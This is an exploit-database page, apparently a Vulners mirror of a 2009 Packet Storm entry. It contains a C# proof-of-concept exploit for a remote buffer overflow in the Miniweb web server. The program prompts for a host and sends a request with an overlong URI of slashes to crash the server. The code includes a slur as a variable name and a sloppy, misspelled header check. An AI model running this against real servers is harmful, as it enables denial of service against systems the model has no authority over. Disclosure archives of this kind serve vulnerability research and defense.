Lucene search
K

Miniweb Buffer Overflow

🗓️ 16 Apr 2009 00:00:00Reported by e.wiZz!Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Miniweb Remote Buffer Overflow, BoF when requesting URI longer than 12

Code
`################### Miniweb Remote Buffer Overflow ############################  
  
########By: e.wiZz!  
  
########Site: www.balcansecurity.com  
  
######## Found with ServMeNot (world's sexiest fuzzer :P )  
  
  
  
In the wild...  
#################################################################  
  
/* BoF when requesting URI longer than 120~ */  
  
using System;  
using System.IO;  
using System.Net;  
using System.Text;  
  
namespace idiot  
{  
class pf  
{  
static void Main(string[] args)  
{  
Console.Write("Enter host:\n");  
string site = Console.ReadLine();  
string uri = null;  
try  
{  
for (int i = 0; i < 144; i++) { uri += "/"; }  
HttpWebRequest request = (HttpWebRequest)  
HttpWebRequest.Create(site + uri);  
HttpWebResponse response = (HttpWebResponse)  
  
request.GetResponse();  
  
//any response we get means that exploit failed  
if (response.GetResponseHeader("Content-Lenght") != "a")  
{  
Console.WriteLine("Exploit failed");  
}  
  
}  
catch (Exception gayexception)  
{  
Console.WriteLine("Cannot connect");  
Console.WriteLine("{0}", gayexception.Message);  
}  
}  
}  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Apr 2009 00:00Current
0.9Low risk
Vulners AI Score0.9
32